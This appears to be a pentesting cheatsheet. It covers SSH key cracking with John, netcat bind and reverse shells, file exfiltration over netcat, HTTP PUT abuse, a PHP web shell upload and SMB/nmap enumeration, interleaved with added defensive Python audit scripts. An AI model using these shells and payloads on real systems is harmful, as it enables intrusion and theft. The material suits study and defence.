With John (John the Ripper), we can crack not only simple password hashes but also the passphrases of SSH private keys. It is pretty simple, so let's get started.
#copying the SSH Key that we have to crack
cp ~/.ssh/id_rsa id_rsa
We will need the ssh2john.py script. It ships with Kali, so you don't need to download it.
#finding the file
updatedb
locate ssh2john.py
cp $(locate ssh2john.py) .
#now, we will create a hash using it
python ssh2john.py id_rsa > id_rsa.hash
Now, let's find and copy rockyou.txt.gz, our wordlist.
locate rockyou.txt
cp $(locate rockyou.txt) .
#now, unzip the file
gunzip rockyou.txt.gz
Finally, let's use john and rockyou.txt to try and crack the SSH Key.
john --wordlist=rockyou.txt id_rsa.hash
There you go!
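The defender's side of the same fact: what makes a key quick to crack with the steps above is either no passphrase at all or the legacy PEM encryption, which derives the key from the passphrase with a single MD5 pass. The script below is an added example (not part of these notes) that reads a key file's header and reports its format, whether it is encrypted and which KDF protects it. make_openssh_key, classify_private_key and the LEGACY_ENCRYPTED sample are this example's own constructions with placeholder key material, not real keys:

```python
"""Audit an SSH private key: is it passphrase-protected, and with which KDF?
Added example; the sample keys are constructed in code and contain no real key material."""
import base64
import struct

MAGIC = b"openssh-key-v1\x00"          # header of the OpenSSH private key container


def _ssh_string(b):
    """Encode bytes as an SSH 'string' (uint32 big-endian length + data)."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf, off):
    """Read an SSH 'string' at offset off; return (data, new offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def make_openssh_key(cipher, kdf, rounds=0):
    """Constructed sample: a minimal openssh-key-v1 file with the given header fields.
    Only the header is meaningful; public/private sections are zero placeholders."""
    kdfopts = b""
    if kdf == b"bcrypt":
        kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)  # salt, rounds
    blob = (MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfopts)
            + struct.pack(">I", 1)            # number of keys in the file
            + _ssh_string(b"\x00" * 32)       # placeholder public key
            + _ssh_string(b"\x00" * 64))      # placeholder (possibly encrypted) private section
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy PEM key (what ssh-keygen wrote by default before 7.8 without -o); body is a placeholder.
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

AAAA
-----END RSA PRIVATE KEY-----
"""


def classify_private_key(text):
    """Return {'format', 'encrypted', 'kdf', 'rounds', 'advice'} for a private key file."""
    lines = [l.strip() for l in text.strip().splitlines() if l.strip()]
    result = {"format": "unknown", "encrypted": None, "kdf": None, "rounds": None, "advice": ""}
    if not lines or not lines[0].startswith("-----BEGIN "):
        result["advice"] = "not a PEM-style private key"
        return result
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(MAGIC):
            result["advice"] = "OPENSSH header but bad openssh-key-v1 magic"
            return result
        off = len(MAGIC)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        encrypted = cipher != b"none"
        if not encrypted:
            advice = "no passphrase: anyone who copies the file can use it; add one with ssh-keygen -p -a 64"
        elif rounds is not None and rounds < 16:
            advice = f"bcrypt with {rounds} rounds is below the ssh-keygen default of 16; raise with ssh-keygen -p -a 64"
        else:
            advice = "ok: encrypted with the bcrypt KDF, slow to guess"
        result.update(format="openssh-v1", encrypted=encrypted, kdf=kdf.decode(), rounds=rounds, advice=advice)
        return result
    # Anything else with a BEGIN line is treated as legacy PEM (RSA/DSA/EC PRIVATE KEY).
    encrypted = any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines)
    if encrypted:
        advice = ("legacy PEM encryption derives the key with a single MD5 pass, so passphrase guessing "
                  "is fast; re-encrypt into the new format with ssh-keygen -p -o -a 64")
    else:
        advice = "no passphrase: anyone who copies the file can use it; add one with ssh-keygen -p -o -a 64"
    result.update(format="legacy-pem", encrypted=encrypted,
                  kdf="md5-evp-bytestokey" if encrypted else None,
                  rounds=1 if encrypted else None, advice=advice)
    return result


if __name__ == "__main__":
    for label, key in [("no passphrase", make_openssh_key(b"none", b"none")),
                       ("bcrypt 64 rounds", make_openssh_key(b"aes256-ctr", b"bcrypt", 64)),
                       ("legacy PEM", LEGACY_ENCRYPTED)]:
        print(f"{label:18} -> {classify_private_key(key)}")
```

Run it over ~/.ssh/*  on hosts you administer: an "openssh-v1" key with a bcrypt KDF and a decent round count is the only class that does not fall quickly to the wordlist run above.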
[user@server]$ base64 -w 0 file_we_want_to_copy
c2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2Fkmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZA==
[root@kali]# echo -n 'c2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2Fkmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZA==' | base64 -d > file_we_want_to_copy
$ python -c 'import pty;pty.spawn("/bin/bash")'
[user@server]$ ^Z
[1]+ Stopped nc -nlvp 4444
[root@kali]# stty raw -echo
[root@kali]# nc -nlvp 4444
[user@server]$ export TERM=xterm
[user@server]$ echo "fully interactive shell!"
When you need a quick web server serving the files in the directory you run it from, use Python's SimpleHTTPServer (http.server in Python 3):
$ python -m SimpleHTTPServer 8000 #python2
$ python3 -m http.server 8000 #python3
Ever felt too lazy to use JS or Burp? Here is how to read cookie values straight from the browser: https://kb.iu.edu/d/ajfi
Given the few resources I could find online explaining how misconfigured HTTP methods can be abused, I decided to write a small piece of information.
If we find a web server with the PUT method allowed, for instance using nmap:
nmap --script http-methods --script-args http-methods.url-path='/website' <target>
or using nikto:
nikto -h http://host
or using cURL:
curl -v -X OPTIONS http://host
or Metasploit.
Then we can abuse it with several tools, such as netcat (the blank line between the headers and the body is required, and Content-Length must equal the body size in bytes):
nc www.host.com 80
PUT /hello.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.host.com
Accept-Language: en-us
Connection: Keep-Alive
Content-type: text/html
Content-Length: 52

<html>
<body>
<h1>Hello, World!</h1>
</body>
</html>
with cURL:
curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://www.host.com/newpage
curl -X PUT -d "text or data to put" http://www.host.com/destination_page
curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://host.com/new_page
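The log-side view of the PUT abuse above, as an added example that is not part of the original notes: a small parser over access-log lines in the Apache/nginx combined format that flags write methods (PUT, DELETE and the WebDAV verbs), ranks a successful PUT of server-side code highest and keeps refused attempts as probes worth correlating with the OPTIONS scans. The log lines, the addresses in them and the names LOG_RE, WRITE_METHODS and find_write_attempts are all constructed for this example:

```python
"""Flag write-method requests (PUT, DELETE, WebDAV) in a web server access log.
Added example; the log lines below are constructed, not taken from a real server."""
import re

# Apache/nginx "combined" log format; only the fields used here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
SERVER_SIDE_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx", ".cgi", ".pl")

SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2020:13:55:36 +0000] "OPTIONS /website/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2020:13:55:40 +0000] "PUT /hello.htm HTTP/1.1" 201 0 "-" "Mozilla/4.0 (compatible; MSIE5.01; Windows NT)"
203.0.113.5 - - [10/Oct/2020:13:56:02 +0000] "PUT /upload/cmd.php HTTP/1.1" 201 0 "-" "curl/7.68.0"
198.51.100.7 - - [10/Oct/2020:13:57:10 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2020:13:58:10 +0000] "PUT /newpage HTTP/1.1" 405 0 "-" "curl/7.68.0"
this line is not in combined format and is skipped
"""


def parse_line(line):
    """Return the captured fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    return d


def severity(entry):
    """high: write succeeded and the target is server-side code; medium: write succeeded;
    low: write attempted but refused (a probe worth correlating with OPTIONS scans)."""
    succeeded = 200 <= entry["status"] < 300
    if succeeded and entry["path"].lower().endswith(SERVER_SIDE_EXT):
        return "high"
    if succeeded:
        return "medium"
    return "low"


def find_write_attempts(lines):
    """Every parseable request using a write method, in log order, with a severity label."""
    findings = []
    for line in lines:
        e = parse_line(line)
        if e is None or e["method"] not in WRITE_METHODS:
            continue
        findings.append({"ip": e["ip"], "method": e["method"], "path": e["path"],
                         "status": e["status"], "severity": severity(e)})
    return findings


if __name__ == "__main__":
    for f in find_write_attempts(SAMPLE_LOG.splitlines()):
        print(f"[{f['severity']:6}] {f['ip']} {f['method']} {f['path']} -> {f['status']}")
```

A 201 on a PUT to a path ending in .php is the line to page on; the refused 405 from the same client a minute after an OPTIONS request is the same actor testing what the server allows.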
Command to find executables with the setuid bit set:
$ find / -perm -u=s -type f 2>/dev/null
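An added example (not from the original notes) that does the same inventory as the find command above from Python and diffs it against a baseline, which is how a newly appeared setuid binary gets noticed on a host you defend. find_setuid, diff_against_baseline and the demo tree built in a temporary directory are this example's own:

```python
"""Inventory setuid executables and diff against a baseline (the defender's side of
`find / -perm -u=s -type f`). Added example; the demo tree is constructed in a temp dir."""
import os
import stat
import tempfile


def find_setuid(root):
    """Regular files under root with the setuid bit set, as paths relative to root."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                     # unreadable entries are skipped, as 2>/dev/null does
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(os.path.relpath(path, root))
    return sorted(found)


def diff_against_baseline(current, baseline):
    """New setuid files are what an investigator wants to see first; missing ones
    may mean a package upgrade or tampering with the baseline itself."""
    cur, base = set(current), set(baseline)
    return {"new": sorted(cur - base), "missing": sorted(base - cur)}


def demo():
    """Build a small tree: one setuid file at top level, one in a subdirectory, one plain file,
    then compare the scan with a constructed baseline that only knew about the first."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "sbin"))
        for rel, mode in [("bin_a", 0o4755), ("plain", 0o755), ("sbin/bin_c", 0o4711)]:
            p = os.path.join(root, rel)
            with open(p, "wb") as fh:
                fh.write(b"#!/bin/sh\nexit 0\n")
            os.chmod(p, mode)
        current = find_setuid(root)
        baseline = ["bin_a"]                 # constructed: what a previous run recorded
        return current, diff_against_baseline(current, baseline)


if __name__ == "__main__":
    current, delta = demo()
    print("setuid files:", current)
    print("delta       :", delta)
```

Run find_setuid("/") as root on a clean install, store the list, and rerun periodically; the "new" set is what to look at.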
When metasploit-framework's pattern_create.rb is not available, this online resource may come in handy:
Handy way to count in/out packets during an nmap scan (or any other connection) using iptables counters:
# iptables -I INPUT -s 10.11.1.22 -j ACCEPT
# iptables -I OUTPUT -d 10.11.1.22 -j ACCEPT
# iptables -Z
# nmap -sT 10.11.1.22
# iptables -vn -L
Bind shell (connecting from alice to bob; bob's IP is publicly addressable):
bob@win: C:\Users> nc -nlvp 4444 -e cmd.exe
alice@linux: # nc -nv a.b.c.d 4444
Reverse shell (connecting from bob to alice, alice being behind a firewall):
alice@linux: # nc -nv a.b.c.d 4444 -e /bin/bash
bob@win: C:\Users> nc -nlvp 4444
The total absence of extremely newbie-level material on how the stack works and how it can be smashed to accomplish buffer overflow attacks made me search the whole web for the best resources; here I will list some of them:
[UPDATE] BEST RESOURCE ON THE WHOLE INTERNET: dostackbufferoverflowgood
(struck out by the author) SANS for dummies
(struck out by the author) well explained theory
On your server (A):
nc -l -p 1234 -q 1 > something.zip < /dev/null
On your "sender client" (B):
cat something.zip | netcat server.ip.here 1234
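Both copy recipes above (the base64 paste and the netcat pipe) move bytes without any integrity check, and a pasted blob can lose characters on the way. The script below is an added example, not part of the original notes: it encodes, decodes and compares SHA-256 digests, showing that a single dropped character breaks the base64 framing while a dropped 4-character group decodes cleanly to the wrong bytes and is only caught by the hash. PAYLOAD, decode_and_verify and verify_file are constructed names for this example:

```python
"""Check that a file moved through an ad-hoc channel (base64 paste or a netcat pipe)
arrived intact. Added example; the payload is constructed."""
import base64
import hashlib

PAYLOAD = bytes(range(256)) * 2          # constructed sample file content, 512 bytes


def fingerprint(data):
    """SHA-256 hex digest, the same value `sha256sum file` prints on the sending side."""
    return hashlib.sha256(data).hexdigest()


def encode_for_paste(data):
    """What `base64 -w 0 file` produces: one line of base64."""
    return base64.b64encode(data).decode()


def decode_and_verify(b64_text, expected_sha256):
    """Decode a pasted blob and compare its SHA-256 with the sender's.
    Returns (ok, reason, data). A dropped character breaks the base64 framing
    (length no longer a multiple of 4); a dropped 4-character group decodes cleanly
    to the wrong bytes, which only the hash catches."""
    try:
        data = base64.b64decode(b64_text.strip(), validate=True)
    except ValueError as exc:                # binascii.Error is a ValueError
        return False, f"base64 decode failed: {exc}", None
    got = fingerprint(data)
    if got != expected_sha256:
        return False, f"hash mismatch: expected {expected_sha256[:16]}..., got {got[:16]}...", data
    return True, "ok", data


def verify_file(path, expected_sha256):
    """Same check for a file that arrived over netcat: hash what was written to disk."""
    with open(path, "rb") as fh:
        return fingerprint(fh.read()) == expected_sha256


if __name__ == "__main__":
    expected = fingerprint(PAYLOAD)
    blob = encode_for_paste(PAYLOAD)
    print("intact       :", decode_and_verify(blob, expected)[:2])
    print("1 char lost  :", decode_and_verify(blob[:40] + blob[41:], expected)[:2])
    print("4 chars lost :", decode_and_verify(blob[:40] + blob[44:], expected)[:2])
```

Print the sha256sum on the sending side before the copy and compare on the receiving side; a blob that decodes without error is not evidence that it decoded to the right file.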
reverse shell cheatsheet: http://www.pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
basic linux privilege escalation cheatsheet: http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
radare r2 cheatsheet: http://www.github.com/radare/radare2/blob/master/doc/intro.md
Possible way to take advantage of an unrestricted file upload in the profile picture section of a web application:
echo "<?php system(\$_GET['cmd']); ?>" > exploit.php
Right-clicking the uploaded picture and choosing "copy image address" puts a URL like the following on our clipboard: //www.nop.cat/admin/ftp/objects/XXXXXXXXXXXX.php
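The application-side counterpart to the upload trick above, as an added example (not from the original notes): the weak handling that stores the client's filename as-is, beside a hardened version that allow-lists image extensions, checks the magic bytes and assigns a random server-chosen name. weak_store_name, validate_and_rename, PNG_SAMPLE and PHP_SAMPLE are this example's own constructions:

```python
"""Profile-picture upload: the weak handling that lets exploit.php land in the web root,
beside a hardened version. Added example; the file contents are constructed."""
import os
import secrets

# Allowed extensions and the magic bytes each must start with.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024


def weak_store_name(client_filename):
    """The vulnerable pattern: trust the uploaded name. 'exploit.php' is stored as exploit.php
    inside the web root, where the PHP handler will run it."""
    return os.path.basename(client_filename)


def validate_and_rename(client_filename, data):
    """Hardened pattern. Returns (ok, reason, stored_name)."""
    if len(data) > MAX_BYTES:
        return False, "too large", None
    _root, ext = os.path.splitext(os.path.basename(client_filename))
    ext = ext.lower()                         # 'avatar.PNG' -> '.png'; 'pic.png.php' -> '.php'
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not allowed", None
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not look like the declared image type", None
    # The client never chooses the stored name: random name, fixed extension.
    return True, "ok", secrets.token_hex(16) + ext


PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32          # constructed, not a full PNG
PHP_SAMPLE = b"<?php echo 'hello'; ?>"                      # constructed harmless script

if __name__ == "__main__":
    print("weak     :", weak_store_name("../../exploit.php"))
    for name, data in [("exploit.php", PHP_SAMPLE), ("pic.png", PHP_SAMPLE),
                       ("pic.png.php", PNG_SAMPLE), ("avatar.PNG", PNG_SAMPLE)]:
        print(f"hardened : {name:12} -> {validate_and_rename(name, data)}")
```

The magic-byte check alone does not stop polyglots (a GIF header followed by script text passes it); what prevents the "copy image address, then browse to it" step from executing anything is the server-chosen name with a fixed image extension, combined with storing uploads outside the web root or in a directory where script handlers are disabled.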
The Server Message Block (SMB) protocol has had a poor security track record for more than 10 years, due to its complex implementation and open nature.
SMB version clarifications:
- SMB1: Windows 2000, XP and Windows 2003
- SMB2: Windows Vista SP1 and Windows 2008
- SMB2.1: Windows 7 and Windows 2008 R2
- SMB3: Windows 8 and Windows 2012
Here are some ways to identify the SMB/NetBIOS service:
using nmap:
nmap -p 139,445 -oG smb.txt 192.168.1.100-254
using nbtscan (available in Kali Linux):
nbtscan -r 192.168.1.0/24
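The -oG output written to smb.txt above is easy to post-process. The parser below is an added example (not from the original notes) that reads grepable nmap output and lists the hosts with a given SMB port open; SAMPLE_GNMAP is a constructed sample, and parse_gnmap and hosts_with_open are the example's own names:

```python
"""Parse nmap grepable output (-oG, as written to smb.txt above) and list hosts with
SMB ports open. Added example; the sample output is constructed."""
import re

SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Sat Oct 10 13:55:36 2020 as: nmap -p 139,445 -oG smb.txt 192.168.1.100-254
Host: 192.168.1.100 ()\tStatus: Up
Host: 192.168.1.100 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///
Host: 192.168.1.101 (fileserver.lan)\tStatus: Up
Host: 192.168.1.101 (fileserver.lan)\tPorts: 139/closed/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///
Host: 192.168.1.102 ()\tStatus: Up
Host: 192.168.1.102 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: closed (1)
# Nmap done at Sat Oct 10 13:55:40 2020 -- 155 IP addresses (3 hosts up) scanned in 4.12 seconds
"""

# "Host: <ip> (<name>)" followed by tab-separated fields such as "Status: ..." and "Ports: ...".
HOST_RE = re.compile(r"^Host: (?P<ip>\S+) \((?P<name>[^)]*)\)\t(?P<rest>.*)$")


def parse_gnmap(text):
    """Return {ip: {'name': str, 'ports': {port: state}}} from -oG output."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                          # comment lines and anything unexpected
        ip, name = m.group("ip"), m.group("name")
        entry = hosts.setdefault(ip, {"name": name, "ports": {}})
        for field in m.group("rest").split("\t"):
            if not field.startswith("Ports: "):
                continue
            for spec in field[len("Ports: "):].split(", "):
                # each spec is port/state/protocol/owner/service/rpc-info/version/
                port, state = spec.split("/")[:2]
                entry["ports"][int(port)] = state
    return hosts


def hosts_with_open(hosts, port):
    """Sorted list of addresses where the given port was reported open."""
    return sorted(ip for ip, h in hosts.items() if h["ports"].get(port) == "open")


if __name__ == "__main__":
    parsed = parse_gnmap(SAMPLE_GNMAP)
    print("445 open:", hosts_with_open(parsed, 445))
    print("139 open:", hosts_with_open(parsed, 139))
```

On the defending side the same list, taken from a scan of your own ranges, is the set of hosts that still expose SMB to the network segment and should be checked against what is actually meant to be a file server.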
Null sessions allow unauthenticated machines (or attackers) to obtain the browse list from other Microsoft servers. This means it is possible to access large amounts of information about the machine, such as password policies, usernames, group names, machine names, users and host IDs. This feature was enabled by default in SMB1, though it was later restricted.
enum4linux is a tool that extracts information from a Windows computer over an SMB null session (also shipped with Kali):
enum4linux -a 192.168.1.26
Remember nmap NSE scripts? They can also discover and enumerate SMB services. They live in the /usr/share/nmap/scripts directory, in as many flavours as you can imagine; just type:
ls -l /usr/share/nmap/scripts/smb*
List versions and run the default scripts (beware: some of those scripts are considered intrusive):
$ nmap -sV -sC nop.cat
Enumerate and gather as much information as possible on the top 1000 ports (recommended first scan):
$ nmap --top-ports 1000 -T4 -sC nop.cat
network sweeping:
$ nmap -sn 192.168.11.200-250
scan for the top 20 TCP ports and save output in a file:
$ nmap -sT -A --top-ports=20 192.168.11.200-250 -oG top-port-sweep.txt
Banner grabbing, service enumeration:
$ nmap -sV -sT 192.168.1.100
OS identification:
$ nmap -O 10.0.0.10
attempt to connect to the SMB service:
$ nmap 10.17.140.100 --script smb-os-discovery.nse
DNS zone transfer NSE script:
$ nmap --script=dns-zone-transfer -p 53 nop.cat